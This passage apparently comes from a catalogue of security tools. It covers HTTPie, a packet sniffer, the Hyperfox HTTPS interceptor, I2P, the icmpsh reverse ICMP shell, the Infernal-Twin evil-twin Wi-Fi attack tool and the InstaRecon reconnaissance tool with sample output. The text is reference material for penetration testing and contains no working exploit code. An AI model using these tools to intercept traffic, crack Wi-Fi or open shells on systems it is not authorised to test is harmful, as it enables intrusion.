Alt-Svc: quic="www.google.com:443"; p="1";
ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
>> RESPONSE HEADERS DETAILS <<
Header Field Name: X-XSS-Protection

Value: 1; mode=block
Reference: http://blogs.msdn.com/b/ie/archive/2008/07/02/
ie8-security-part-iv-the-xss-filter.aspx
Security Description: This header enables the Cross-site
scripting (XSS) filter built into most recent web
browsers. It's usually enabled by default anyway, so the
role of this header is to re-enable the filter for this
particular website if it was disabled by the user. This
header is supported in IE 8+, and in Chrome (not sure
which versions). The anti-XSS filter was added in Chrome
4. Its unknown if that version honored this header.
Security Reference: https://www.owasp.org/index.php/
List_of_useful_HTTP_headers
Recommendations: Use "X-XSS-Protection: 1; mode=block"
whenever is possible (ref. http://blogs.msdn.com/b/
ieinternals/archive/2011/01/31/controlling-the-internetexplorer-xss-filter-with-the-x-xss-protection-httpheader.aspx).
CWE: CWE-79: Improper Neutralization of Input During Web
Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: Set-Cookie
Value:
PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938
:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015
16:02:17 GMT; path=/; domain=.google.com.br,
NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34
-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-
oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security
pitfalls. In particular, cookies encourage developers to
rely on ambient authority for authentication, often
becoming vulnerable to attacks such as cross-site request
forgery. Also, when storing session identifiers in
cookies, developers often create session fixation
vulnerabilities. Transport-layer encryption, such as that
employed in HTTPS, is insufficient to prevent a network
attacker from obtaining or altering a victim's cookies
because the cookie protocol itself has various
vulnerabilities. In addition, by default, cookies do not
provide confidentiality or integrity from network
attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/
rfc6265#section-8
Recommendations: Please at least read these references:
https://tools.ietf.org/html/rfc6265#section-8 and
https://www.owasp.org/index.php/
Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without
'Secure' Attribute
Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/
rfc7233#section-2.3
Security Description: Unconstrained multiple range
requests are susceptible to denial-of-service attacks
because the effort required to request many overlapping
ranges of the same data is tiny compared to the time,
memory, and bandwidth consumed by attempting to serve the
requested data in many parts.
rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or
reject egregious range requests, such as requests for
more than two overlapping ranges or for many small ranges
in a single set, particularly when the ranges are
requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption
('Resource Exhaustion')
Header Field Name: Expires
Value: -1
rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Vary
Value: Accept-Encoding
rfc7231#section-7.1.4
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Server
Value: gws
Security Description: Overly long and detailed Server
field values increase response latency and potentially
reveal internal implementation details that might make it
(slightly) easier for attackers to find and exploit known
security holes.
Recommendations: An origin server SHOULD NOT generate a
Server field containing needlessly fine-grained detail
and SHOULD limit the addition of subproducts by third
parties.
CWE: CWE-200: Information Exposure
Header Field Name: Connection
Value: close
rfc7230#section-6.1
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Cache-Control
Value: private, max-age=0
rfc7234#section-5.2
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
Because cache contents persist after an
HTTP request is complete, an attack on the cache can

reveal information long after a user believes that the
information has been removed from the network.
Therefore, cache contents need to be protected as
sensitive information.
rfc7234#section-8
Recommendations: Do not store unnecessarily sensitive
information in the cache.
CWE: CWE-524: Information Exposure Through Caching
Header Field Name: Date
Value: Sun, 08 Nov 2015 14:12:18 GMT
rfc7231#section-7.1.1.2
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include
security mechanisms, it is intended to be used in
conjunction with security tools. Users' personal
information should always be protected with reasonable
security safeguards in keeping with the sensitivity of
the information.
Security Reference: http://www.w3.org/TR/P3P11/
#principles_security
Recommendations: CWE: CWE URL: Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Security Description: In practice, resource owners do not
always properly configure their origin server to provide
the correct Content-Type for a given representation, with
the result that some clients will examine a payload's

content and override the specified type. Clients that do
so risk drawing incorrect conclusions, which might expose
additional security risks (e.g., "privilege escalation").
Recommendations: Properly configure their origin server
to provide the correct Content-Type for a given
representation.
CWE: CWE-430: Deployment of Wrong Handler
Header Field Name: X-Frame-Options
Value: SAMEORIGIN
Security Description: The use of "X-Frame-Options" allows
a web page from host B to declare that its content (for
example, a button, links, text, etc.) must not be
displayed in a frame (<frame> or <iframe>) of another
page (e.g., from host A). This is done by a policy
declared in the HTTP header and enforced by browser
implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations:
In 2009 and 2010, many browser vendors
([Microsoft-X-Frame-Options] and [Mozilla-X-FrameOptions]) introduced the use of a non-standard HTTP

[RFC2616] header field "X-Frame-Options" to protect
against clickjacking. Please check here https://
www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure

>> RESPONSE MISSING HEADERS <<
Header Field Name: Pragma
rfc7234#section-5.4
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
rfc7234#section-8
Recommendations: The "Pragma" header field allows
backwards compatibility with HTTP/1.0 caches, so that
clients can specify a "no-cache" request that they will
understand (as Cache-Control was not defined until HTTP/
1.1). When the Cache-Control header field is also present
and understood in a request, Pragma is ignored. Define
"Pragma: no-cache" whenever is possible.
CWE: CWE-524: Information Exposure Through Caching
Header Field Name: Public-Key-Pins
Security Description: HTTP Public Key Pinning (HPKP) is a
trust on first use security mechanism which protects
HTTPS websites from impersonation using fraudulent
certificates issued by compromised certificate
authorities. The security context or pinset data is
supplied by the site or origin.

Recommendations: Deploying Public Key Pinning (PKP)
safely will require operational and organizational
maturity due to the risk that hosts may make themselves
unavailable by pinning to a set of SPKIs that becomes
invalid. With care, host operators can greatly reduce the
risk of man-in-the-middle (MITM) attacks and other falseauthentication problems for their users without incurring
undue risk. PKP is meant to be used together with HTTP
Strict Transport Security (HSTS) [RFC6797], but it is
possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
Header Field Name: Public-Key-Pins-Report-Only
Security Description: HTTP Public Key Pinning (HPKP) is a
trust on first use security mechanism which protects
HTTPS websites from impersonation using fraudulent
certificates issued by compromised certificate
authorities. The security context or pinset data is
supplied by the site or origin.
Recommendations: Deploying Public Key Pinning (PKP)
safely will require operational and organizational
maturity due to the risk that hosts may make themselves
unavailable by pinning to a set of SPKIs that becomes
invalid. With care, host operators can greatly reduce the
risk of man-in-the-middle (MITM) attacks and other false-
authentication problems for their users without incurring

undue risk. PKP is meant to be used together with HTTP
Strict Transport Security (HSTS) [RFC6797], but it is
possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
Header Field Name: Strict-Transport-Security
Security Description: HTTP Strict Transport Security
(HSTS) is a web security policy mechanism which helps to
protect secure HTTPS websites against downgrade attacks
and cookie hijacking. It allows web servers to declare
that web browsers (or other complying user agents) should
only interact with it using secure HTTPS connections, and
never via the insecure HTTP protocol. HSTS is an IETF
standards track protocol and is specified in RFC 6797.
Recommendations: Please at least read this reference:
https://www.owasp.org/index.php/
HTTP_Strict_Transport_Security.
CWE: CWE-311: Missing Encryption of Sensitive Data
Header Field Name: Frame-Options
Security Description: The use of "X-Frame-Options" allows
a web page from host B to declare that its content (for
example, a button, links, text, etc.) must not be
displayed in a frame (<frame> or <iframe>) of another
page (e.g., from host A). This is done by a policy

declared in the HTTP header and enforced by browser
implementations.
Recommendations:
In 2009 and 2010, many browser vendors
([Microsoft-X-Frame-Options] and [Mozilla-X-FrameOptions]) introduced the use of a non-standard HTTP

[RFC2616] header field "X-Frame-Options" to protect
against clickjacking. Please check here https://
www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
Header Field Name: X-Content-Type-Options
Reference: http://blogs.msdn.com/b/ie/archive/2008/09/02/
ie8-security-part-vi-beta-2-update.aspx
Security Description: The only defined value, "nosniff",
prevents Internet Explorer and Google Chrome from MIMEsniffing a response away from the declared content-type.
This also applies to Google Chrome, when downloading
extensions. This reduces exposure to drive-by download
attacks and sites serving user uploaded content that, by
clever naming, could be treated by MSIE as executable or
dynamic HTML files.
Recommendations: Always use the only defined value,
"nosniff".

Header Field Name: Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires
careful tuning and precise definition of the policy. If
enabled, CSP has significant impact on the way browser
renders pages (e.g., inline JavaScript disabled by
default and must be explicitly allowed in policy). CSP
prevents a wide range of attacks, including Cross-site
scripting and other cross-site injections.
Recommendations: Read the reference http://www.w3.org/TR/
CSP/ and set according to your case. This is not a easy
job.
Header Field Name: X-Content-Security-Policy

job.
Header Field Name: X-WebKit-CSP
job.
Header Field Name: Content-Security-Policy-Report-Only
Security Description: Like Content-Security-Policy, but
only reports. Useful during implementation, tuning and

testing efforts.
job.
Download Hsecscan
HTTPIE - A CLI, CURL-LIKE TOOL FOR HUMANS
HTTPie (pronounced aych-tee-tee-pie) is a command line

HTTP client. Its goal is to make CLI interaction with web
services as human-friendly as possible. It provides a simple

http command that allows for sending arbitrary HTTP requests
using a simple and natural syntax, and displays colorized
output. HTTPie can be used for testing, debugging, and
generally interacting with HTTP servers.
HTTPie is written in Python, and under the hood it uses the
excellent Requests and Pygments libraries.
Main Features
Expressive and intuitive syntax

Formatted and colorized terminal output
Built-in JSON support
Forms and file uploads
HTTPS, proxies, and authentication
Arbitrary request data
Custom headers
Persistent sessions
Wget-like downloads
Python 2.6, 2.7 and 3.x support
Linux, Mac OS X and Windows support
Plugins
Documentation
Test coverage
Installation
On Mac OS X, HTTPie can be installed via Homebrew:

$ brew install httpie
Most Linux distributions provide a package that can be

installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie
# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows,

Mac OS X, Linux, , and provides the latest version) is to use
pip:
# Make sure we have an up-to-date version of pip and
setuptools:
$ pip install --upgrade pip setuptools
$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try
easy_install httpie as a fallback.)
Development version
The latest development version can be installed directly from
GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD
# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/
tarball/master
Usage
Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output
options:
$ http -v example.org
Use Github API to post a comment on an issue with

authentication:
$ http -a USERNAME POST https://api.github.com/repos/
jkbrzt/httpie/issues/83/comments body='HTTPie is
awesome!'
Upload a file using redirected input:

$ http example.org < file.json
Download a file and save it via redirected output:

$ http example.org/file > file
Download a file wget style:

$ http --download example.org/file
Use named sessions to make certain aspects or the

communication persistent between requests to the same host:
$ http --session=logged-in -a username:password
httpbin.org/get API-Key:123$ http --session=logged-in
httpbin.org/headers
Set a custom Host header to work around missing DNS

records:
$ http localhost:8000 Host:example.com
What follows is a detailed documentation. It covers the

command syntax, advanced usage, and also features
additional examples.
HTTP Method
The name of the HTTP method comes right before the URL
argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:

DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command,

HTTPie defaults to either GET (with no request data) or POST
(with request data).
Request URL
The only information HTTPie needs to perform a request is a

URL. The default scheme is, somewhat unsurprisingly,
http://, and can be omitted from the argument http
example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This
means that, for example :3000 would expand to http://
localhost:3000 If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with

querystring parameters on the terminal, you may appreciate
the param==value syntax for appending URL parameters so
that you don't have to worry about escaping the & separators.
To search for HTTPie on Google Images you could use this
command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1
Download HTTPie
HTTPNETWORKSNIFFER V1.50 - PACKET SNIFFER TOOL
THAT CAPTURES ALL HTTP REQUESTS/RESPONSES
HTTPNetworkSniffer is a packet sniffer tool that captures all

HTTP requests/responses sent between the Web browser and
the Web server and displays them in a simple table. For every
HTTP request, the following information is displayed: Host
Name, HTTP method (GET, POST, HEAD), URL Path, User
Agent, Response Code, Response String, Content Type,
Referer, Content Encoding, Transfer Encoding, Server Name,
Content Length, Cookie String, and more...
You can easily select one or more HTTP information lines, and
then export them to text/html/xml/csv file or copy them to the
clipboard and then paste them into Excel.
System Requirements
This utility works on any version of Windows, starting from

Windows 2000 and up to Windows 10, including 64-bit
systems.
One of the following capture drivers is required to use
HTTPNetworkSniffer:
WinPcap Capture Driver: WinPcap is an open source
capture driver that allows you to capture network
packets on any version of Windows. You can
download and install the WinPcap driver from this
Web page.
Microsoft Network Monitor Driver version 2.x (Only
for Windows 2000/XP/2003): Microsoft provides a
free capture driver under Windows 2000/XP/2003
that can be used by HTTPNetworkSniffer, but this
driver is not installed by default, and you have to
manually install it, by using one of the following
options:
Option 1: Install it from the CD-ROM of
Windows 2000/XP according to the instructions
in Microsoft Web site
Option 2 (XP Only) : Download and install the
Windows XP Service Pack 2 Support Tools.
One of the tools in this package is netcap.exe.
When you run this tool in the first time, the
Network Monitor Driver will automatically be
installed on your system.
Microsoft Network Monitor Driver version 3.x:
Microsoft provides a new version of Microsoft
Network Monitor driver (3.x) that is also supported
under Windows 7/Vista/2008.
The new version of Microsoft Network Monitor (3.x) is
available to download from Microsoft Web site.
You can also try to use HTTPNetworkSniffer without

installing any driver, by using the 'Raw Sockets' method.
Unfortunately, Raw Sockets method has many problems:
It doesn't work in all Windows systems, depending on
Windows version, service pack, and the updates
installed on your system.
On Windows 7 with UAC turned on, 'Raw Sockets'
method only works when you run
HTTPNetworkSniffer with 'Run As Administrator'.
Start Using HTTPNetworkSniffer
Except of a capture driver needed for capturing network

packets, HTTPNetworkSniffer doesn't require any installation
process or additional dll files. In order to start using it, simply
run the executable file - HTTPNetworkSniffer.exe
After running HTTPNetworkSniffer in the first time, the 'Capture
Options' window appears on the screen, and you're requested
to choose the capture method and the desired network adapter.
In the next time that you use HTTPNetworkSniffer, it'll
automatically start capturing packets with the capture method
and the network adapter that you previously selected. You can
always change the 'Capture Options' again by pressing F9.
After choosing the capture method and network adapter,
HTTPNetworkSniffer captures and displays every HTTP
request/response sent between your Web browser and the
remote Web server.
/load_file_pcap
<Filename>
Loads the specified capture file, created

by WinPcap driver.
/
load_file_netmo
n <Filename>
Loads the specified capture file, created

by Network Monitor driver 3.x.
DownloadHTTPNetworkSniffer v1.50
HYPERFOX - HTTP AND HTTPS TRAFFIC INTERCEPTOR
Hyperfox is a security tool for proxying and recording HTTP

and HTTPs communications on a LAN.
Hyperfox is capable of forging SSL certificates on the fly using
a root CA certificate and its corresponding key (both provided
by the user). If the target machine recognizes the root CA as
trusted, then HTTPs traffic can be succesfully intercepted and
recorded.
Hyperfox saves captured data to a SQLite database for later
inspection and also provides a web interface for watching live
traffic and downloading wire formatted messages.
DownloadHyperfox
I2P - THE INVISIBLE INTERNET PROJECT
I2P is an anonymous network, exposing a simple layer that

applications can use to anonymously and securely send
messages to each other. The network itself is strictly message
based (a la IP), but there is a library available to allow reliable
streaming communication on top of it (a la TCP). All
communication is end to end encrypted (in total there are four
layers of encryption used when sending a message), and even
the end points ("destinations") are cryptographic identifiers
(essentially a pair of public keys).
How does it work?
To anonymize the messages sent, each client application has

their I2P "router" build a few inbound and outbound "tunnels" a sequence of peers that pass messages in one direction (to
and from the client, respectively). In turn, when a client wants to
send a message to another client, the client passes that
message out one of their outbound tunnels targeting one of the
other client's inbound tunnels, eventually reaching the
destination. Every participant in the network chooses the length
of these tunnels, and in doing so, makes a tradeoff between
anonymity, latency, and throughput according to their own
needs. The result is that the number of peers relaying each end
to end message is the absolute minimum necessary to meet
both the sender's and the receiver's threat model.
The first time a client wants to contact another client, they make
a query against the fully distributed "network database" - a
custom structured distributed hash table (DHT) based off the
Kademlia algorithm. This is done to find the other client's
inbound tunnels efficiently, but subsequent messages between
them usually includes that data so no further network database
lookups are required.
What can you do with it?
Within the I2P network, applications are not restricted in how

they can communicate - those that typically use UDP can make
use of the base I2P functionality, and those that typically use
TCP can use the TCP-like streaming library. We have a generic
TCP/I2P bridge application ("I2PTunnel") that enables people
to forward TCP streams into the I2P network as well as to
receive streams out of the network and forward them towards a
specific TCP/IP address.
I2PTunnel is currently used to let people run their own
anonymous website ("eepsite") by running a normal webserver
and pointing an I2PTunnel 'server' at it, which people can

access anonymously over I2P with a normal web browser by
running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we
use the same technique to run an anonymous IRC network
(where the IRC server is hosted anonymously, and standard
IRC clients use an I2PTunnel to contact it). There are other
application development efforts going on as well, such as one
to build an optimized swarming file transfer application (a la
BitTorrent), a distributed data store (a la Freenet / MNet), and a
blogging system (a fully distributed LiveJournal), but those are
not ready for use yet.
I2P is not inherently an "outproxy" network - the client you send
a message to is the cryptographic identifier, not some IP
address, so the message must be addressed to someone
running I2P. However, it is possible for that client to be an
outproxy, allowing you to anonymously make use of their
Internet connection. To demonstrate this, the "eepproxy" will
accept normal non-I2P URLs (e.g. "http://www.i2p.net") and
forward them to a specific destination that runs a squid HTTP
proxy, allowing simple anonymous browsing of the normal web.
Simple outproxies like that are not viable in the long run for
several reasons (including the cost of running one as well as
the anonymity and security issues they introduce), but in certain
circumstances the technique could be appropriate.
The I2P development team is an open group, welcome to all
who are interested in getting involved, and all of the code is
open source. The core I2P SDK and the current router
implementation is done in Java (currently working with both sun
and kaffe, gcj support planned for later), and there is a simple
socket based API for accessing the network from other
languages (with a C library available, and both Python and Perl
in development). The network is actively being developed and
has not yet reached the 1.0 release, but the current roadmap
describes our schedule.
Download I2P
ICMPSH - SIMPLE REVERSE ICMP SHELL
Sometimes, network administrators make the penetration

tester's life harder. Some of them do use firewalls for what they
are meant to, surprisingly! Allowing traffic only onto known
machines, ports and services (ingress filtering) and setting
strong egress access control lists is one of these cases. In such
scenarios when you have owned a machine part of the internal
network or the DMZ (e.g. in a Citrix breakout engagement or
similar), it is not always trivial to get a reverse shell over TCP,

not to consider a bind shell.
However, what about UDP (commonly a DNS tunnel) or ICMP
as the channel to get a reverse shell? ICMP is the focus on this
tool.
Description
icmpsh is a simple reverse ICMP shell with a win32 slave and a

POSIX compatible master in C, Perl or Python. The main
advantage over the other similar open source tools is that it
does not require administrative privileges to run onto the target
machine.
The tool is clean, easy and portable. The slave (client) runs
on the target Windows machine, it is written in C and works
on Windows only whereas the master (server) can run on any
platform on the attacker machine as it has been
implemented in C and Perl.
Features
Open source software - primarily coded by Nico, forked by

me.
Client/server architecture.
The master is portable across any platform that can run
either C, Perl or Python code.
The target system has to be Windows because the slave
runs on that platform only for now.
The user running the slave on the target system does not
require administrative privileges.
Usage
Running the master

The master is straight forward to use. There are no extra
libraries required for the C and Python versions. The Perl

master however has the following dependencies:
IO::Socket
NetPacket::IP
NetPacket::ICMP
When running the master, don't forget to disable ICMP replies
by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the
slave, but the slave is unlikely to receive commands send from
the master.
Running the slave
The slave comes with a few command line options as outlined
below:
-t host
host ip address to send ping requests
to. This option is mandatory!

-r
send a single test icmp request
containing the string "Test1234" and then quit.

This is for testing the connection.
-d milliseconds
delay between requests in milliseconds
-o milliseconds
timeout of responses in milliseconds.
If a response has not received in time,

the slave will increase a counter of
blanks. If that counter reaches a limit, the slave will
quit.
The counter is set back to 0 if a
response was received.
-b num
limit of blanks (unanswered icmp
requests before quitting

-s bytes
maximal data buffer size in bytes
In order to improve the speed, lower the delay (-d) between

requests or increase the size (-s) of the data buffer.
Downloadicmpsh
INFERNAL-TWIN - THIS IS EVIL TWIN ATTACK
AUTOMATED (WIRELESS HACKING)
This tool is created to aid the penetration testers in assessing

wireless security. Author is not responsible for misuse. Please
read instructions thoroughly.
Usage
sudo python InfernalWireless.py
How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-authmysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb
$ sudo apt-get install aircrack-ng
$ git clone https://github.com/entropy1337/infernaltwin.git
$ cd infernal-twin
$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root
FAQ:
I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The
solution is to create a new user on the database and use that
user for launching the tool. Follow the following steps.
1. Delete dbconnect.conf file from the Infernalwireless folder
2. Run the following command from your mysql console.

mysql> use mysql;
mysql> CREATE USER 'root2'@'localhost' IDENTIFIED
BY 'enter the new password here';
mysql> GRANT ALL PRIVILEGES ON \*.\* TO
'root2'@'localhost' WITH GRANT OPTION;
3. Try to run the tool again.
Release Notes:
New Features:
GUI Wireless security assessment SUIT
Impelemented
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
MiTM
Probe Request
Changes:
Improved compatibility
Report improvement
Better NAT Rules
Bug Fixes:
Wireless Evil Access Point traffic redirect

Fixed WPA2 Cracking
Fixed Infernal Wireless
Fixed Free AP
Check for requirements
DB implementation via config file
Improved Catch and error
Check for requirements
Works with Kali 2
Coming Soon:
Parsing t-shark log files for gathering creds and more
More attacks.
Expected bugs:
Wireless card might not be supported
Windodw might crash
Freeze
A lot of work to be done, but this tool is still being

developed.
Download Infernal-Twin
INSTANT PDF PASSWORD PROTECTOR - PASSWORD
PROTECT PDF FILE
Instant PDF Password Protector is the Free tool to quickly

Password Protect PDF file on your system.
With a click of button, you can lock or protect any of your
sensitive/private PDF documents. You can also use any of the
standard Encryption methods - RC4/AES (40-bit, 128-bit, 256bit) based upon the desired security level.
In addition to this, it also helps you set advanced restrictions to
prevent Printing, Copying or Modification of target PDF file.
To further secure it, you can also set 'Owner Password' (also
called Permissions Password) to stop anyone from removing
these restrictions.
'PDF Password Protector' includes Installer for quick
installation/un-installation. It works on both 32-bit & 64-bit
platforms starting from Windows XP to Windows 8.
Features
Instantly Password Protect PDF document with a click of

button
Supports all versions of PDF documents
Lock PDF file with Password (User/Document Open

Password)
Supports all the standard Encryption methods - RC4/AES

(40-bit,128-bit, 256-bit)
[Advanced] Protect PDF file by adding following

Restrictions
Copying
Printing
Signing
Commenting
Changing the Document
Document Assembly
Page Extraction
Filling of Form Fields
[Advanced] Set the Permission Password (Owner

Password) to prevent removal of above restrictions
Advanced Settings Dialog to quickly alter above

permissions/restrictions
Drag & Drop support for easier selection of PDF file
Very easy to use with simple & attractive GUI screen

software
DownloadInstant PDF Password Protector

INSTARECON - AUTOMATED DIGITAL RECONNAISSANCE
Automated basic digital reconnaissance. Great for getting an

initial footprint of your targets and discovering additional
subdomains. InstaRecon will do:
DNS (direct, PTR, MX, NS) lookups
Whois (domains and IP) lookups
Google dorks in search of subdomains
Shodan lookups
Reverse DNS lookups on entire CIDRs
...all printed nicely on your console or csv file.
InstaRecon will never scan a target directly. Information is
retrieved from DNS/Whois servers, Google, and Shodan.
Installing with pip
Simply install dependencies using pip. Tested on Ubuntu 14.04

and Kali Linux 1.1.0a.
or
pip install pythonwhois ipwhois ipaddress shodan
Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/
github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
# ____________________ Scanning github.com
____________________ #
# DNS lookups
[*] Domain: github.com
[*] IPs & reverse DNS:
192.30.252.130 - github.com
[*] NS records:
ns4.p16.dynect.net
204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
208.78.70.16 - ns1.p16.dynect.net
[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
74.125.203.26
64.233.177.26
173.194.219.27
74.125.25.26 - pa-in-f26.1e100.net
# Whois lookups
[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date:
2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://

www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://
www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://
www.icann.org/epp#clientDeleteProhibited)
Registry Registrant ID:
Registrant Name: GitHub Hostmaster
Registrant Organization: GitHub, Inc.
Registrant Street: 88 Colin P Kelly Jr St,
Registrant City: San Francisco
Registrant State/Province: CA
Registrant Postal Code: 94107
Registrant Country: US
Registrant Phone: +1.4157354488
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: hostmaster@github.com
Registry Admin ID:
Admin Name: GitHub Hostmaster
Admin Organization: GitHub, Inc.
Admin Street: 88 Colin P Kelly Jr St,
Admin City: San Francisco
Admin State/Province: CA
Admin Postal Code: 94107
Admin Country: US
Admin Phone: +1.4157354488
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:

Admin Email: hostmaster@github.com
Registry Tech ID:
Tech Name: GitHub Hostmaster
Tech Organization: GitHub, Inc.
Tech Street: 88 Colin P Kelly Jr St,
Tech City: San Francisco
Tech State/Province: CA
Tech Postal Code: 94107
Tech Country: US
Tech Phone: +1.4157354488
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: hostmaster@github.com
Name Server: ns1.p16.dynect.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System:
http://wdprs.internic.net/
>>> Last update of WHOIS database:
2015-05-04T06:48:47-0700
[*] Whois IP:
asn: 36459
asn_cidr: 192.30.252.0/24
asn_country_code: US
asn_date: 2012-11-15
asn_registry: arin
net 0:
cidr: 192.30.252.0/22
range: 192.30.252.0 - 192.30.255.255
name: GITHUB-NET4-1
description: GitHub, Inc.
handle: NET-192-30-252-0-1
address: 88 Colin P Kelly Jr Street
city: San Francisco
state: CA
postal_code: 94107
country: US
abuse_emails: abuse@github.com
tech_emails: hostmaster@github.com
created: 2012-11-15 00:00:00
updated: 2013-01-05 00:00:00
# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub
Port: 22
Banner: SSH-2.0-libssh-0.6.0
Key type: ssh-rsa
Key:
AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa
+PXYPCPy6rbTrTtw7PH
kccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJi
zHhbn2mUjvSAHQqZETY
P81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf
+Se8xhHTvKSCZIFImWwoG6mbUoW
f9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B
+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lG
HSZXy28G3skua2SmVi/
w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:
56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://192.30.252.130/
Connection: close
# Querying Google for subdomains and Linkedin pages, this
might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/
company/github
[*] Subdomains:
blueimp.github.com
199.27.75.133
bounty.github.com
199.27.75.133
designmodo.github.com
199.27.75.133
developer.github.com
199.27.75.133
digitaloxford.github.com
199.27.75.133
documentcloud.github.com
199.27.75.133
education.github.com
50.19.229.116 ec2-50-19-229-116.compute-1.amazonaws.com
enterprise.github.com
erkie.github.com
199.27.75.133
eternicode.github.com
199.27.75.133
facebook.github.com
199.27.75.133
fortawesome.github.com
199.27.75.133
